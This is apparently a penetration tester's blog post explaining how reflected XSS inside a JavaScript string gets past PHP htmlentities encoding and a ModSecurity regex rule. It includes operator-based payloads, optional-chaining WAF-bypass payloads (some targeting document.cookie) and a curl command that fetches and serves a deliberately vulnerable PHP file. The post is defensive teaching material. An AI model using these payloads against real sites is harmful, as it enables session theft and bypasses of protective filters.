HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a
<div>tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes. But HTML entity encoding doesn’t work if you’re putting untrusted data inside a
<script>tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the encode syntax for the part of the HTML document you’re putting untrusted data into. That’s what the rules below are all about.
During a test on a customer’s web application, I found something very closed to the following code (it’s more simplified than the original):
Here the developer used the PHP
htmlentities function to sanitize the user input on
$_GET['user'] converting special characters to HTML entities and using
ENT_QUOTES flag to convert both single and double quotes (as you can see in the table below):
You can find something similar in an awesome Labs by PortSwigger:
If you want to run my vulnerable web application example, just copy and paste the command below and point your browser to http://localhost:9000 you should find it useful in order to test all the example payloads in this article.
curl -s 'https://gist.githubusercontent.com/theMiddleBlue/a098f37fbc08b47b2f2ddad8d1579b21/raw/103a1ccb2e46e22a35cc982a49a41b7d0/index.php' > index.php; php -S 0.0.0.0:9000
As you can guess, in my example the
user arg, it would be possible to exploit a reflected XSS with a simple injection like
/?user=foo');alert('XSS. There’re two important things in this specific scenario:
myFunctionand start a new function using the semicolon character (by injecting something like
');alert('the semicolon character will be removed before printing it on the response body).
- Due to its context, the injected payload (even encoded by
htmlentities) is decoded by the user’s browser when clicking on the link. This means that the browser will decode the encoded single quote character.
Exploit using Arithmetic Operators
alert(1) first and then performs the subtraction operation. We can use this condition to exploit the XSS vulnerability in our example to avoid using a semicolon.
The payload could be the following:
As you can see, the
How many operators can be used to exploit XSS here?
|OPERATORS||WORKING PAYLOADS||COPY&PASTE EXAMPLE|
|Bitwise AND (&)||N/A||console.log(‘a’&alert(1))|
|Bitwise OR (|)||foo’)|alert(‘a||console.log(‘a’|alert(1))|
|Bitwise XOR (^)||foo’)^alert(‘a||console.log(‘a’^alert(1))|
|Comma operator (,)||foo’),alert(‘a||console.log(‘a’,alert(1))|
|Conditional (ternary) operator||foo’)%3falert(‘a’):alert(‘b||console.log(‘a’?alert(1):»)|
|Greater/Less than (>/<)||N/A||console.log(‘a’>alert(1))|
|Greater/Less than or equal (>=|<=)||N/A||console.log(‘a’>=alert(1))|
|Left/Right shift (>>|<<)||N/A||console.log(‘a'<<alert(1))|
|Logical AND (&&)||N/A||console.log(‘a’&&alert(1))|
|Logical OR (||)||foo’)||alert(‘a||console.log(false||alert(1))|
|In Operator||foo’) in alert(‘||console.log(‘a’ in alert(1))|
In the specific case of our customer’s web application, characters
> are encoded by
Exploit using Optional Chaining (?.)
As you can see, the first two syntaxes would be blocked by the WAF, but the last two don’t match the regex. Indeed a really basic technique to bypass a weak rule is to insert white spaces or comment between the function name and the first round-bracket. If you use ModSecurity of course you know that is easy to fix this kind of bypass by using the transformation functions
removeWhitespace (removes all whitespace characters from input) and
removeCommentsChar (removes common comments chars such as: /*, */, —, #) as the following example:
SecRule ARGS "@rx /(alert|eval|string|decodeURI|...)[(]/" \ "id:123,\ t:removeWhitespace,\ t:removeCommentsChar,\ block"
Anyway it’s possible to bypass this specific rule by using the optional chaining operator:
The optional chaining operator (
?.) permits reading the value of a property located deep within a chain of connected objects without having to expressly validate that each reference in the chain is valid. The
?.operator functions similarly to the
.chaining operator, except that instead of causing an error if a reference is nullish (
undefined), the expression short-circuits with a return value of
undefined. When used with function calls, it returns
undefinedif the given function does not exist.
Using this operator we can bypass the ModSecurity rule shown before, and the payload becomes something like this:
Used as payload on our vulnerable web application, we can exploit the XSS bypassing both HTML entities encoding and Web Application Firewall rule:
Moreover, this operator should be used to bypass other «bad word» based WAF rules such as document.cookie with document?.cookie. Following a list of examples that you can use and you can test on your browser console:alert ?. (document ?. cookie)
self?.[‘al’+’ert’/* foo bar */]?.(‘XSS’)
true in alert /* foo */ ?. /* bar */ (/XSS/)
1 * alert ?. (/* foo */’XSS’/* bar */)
true, alert ?. (…[/XSS/])
true in self ?. [/alert/.source](/XSS/)
self ?. [/alert/ ?. source ?. toString()](/XSS/)
Never ever HTML entity encode untrusted data to sanitize user input and don’t make your own WAF rule to validate it. Use a security encoding library for your app and use the OWASP CRS as a Web Application Firewall Rule Set.